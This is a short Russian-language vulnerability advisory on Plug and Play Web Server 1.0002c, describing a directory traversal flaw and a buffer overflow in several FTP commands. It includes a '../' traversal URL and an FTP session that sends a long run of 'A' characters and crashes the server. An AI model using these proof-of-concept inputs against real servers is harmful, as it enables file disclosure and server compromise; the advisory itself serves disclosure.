Программа: Plug and Play Web Server 1.0002c 

Две уязвимости обнаружено в Plug and Play Web Server. Злонамеренный пользователь может раскрыть чувствительную информацию и скомпрометировать уязвимую систему. 

Удаленный атакующий может использовать последовательность обхода каталога ("../" или "..\"), чтобы получить доступ к произвольным файлам вне wwwroot каталога.
Переполнение буфера обнаружено в нескольких параметрах в командах dir, ls, delete, mkdir, DELE, RMD, и MKD. В результате удаленный атакующий может выполнить произвольный код на уязвимом сервере. 

Пример/Эксплоит: 

1. 
http://[victim]/../../existing_file

2. 
dir [Ax509]

ls [Ax509]

delete [Ax509]

mkdir [Ax509]

DELE [Ax509]

RMD [Ax509]

MKD [Ax509]

Example:
--------------------
ftp> o 127.0.0.1
Connected to 127.0.0.1.
220 Plug and Play Web Server V1.0
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in
ftp> dir
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful
Connection closed by remote host.
ftp> o 127.0.0.1
> ftp: connect :Unknown error number
ftp>
--------------------

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии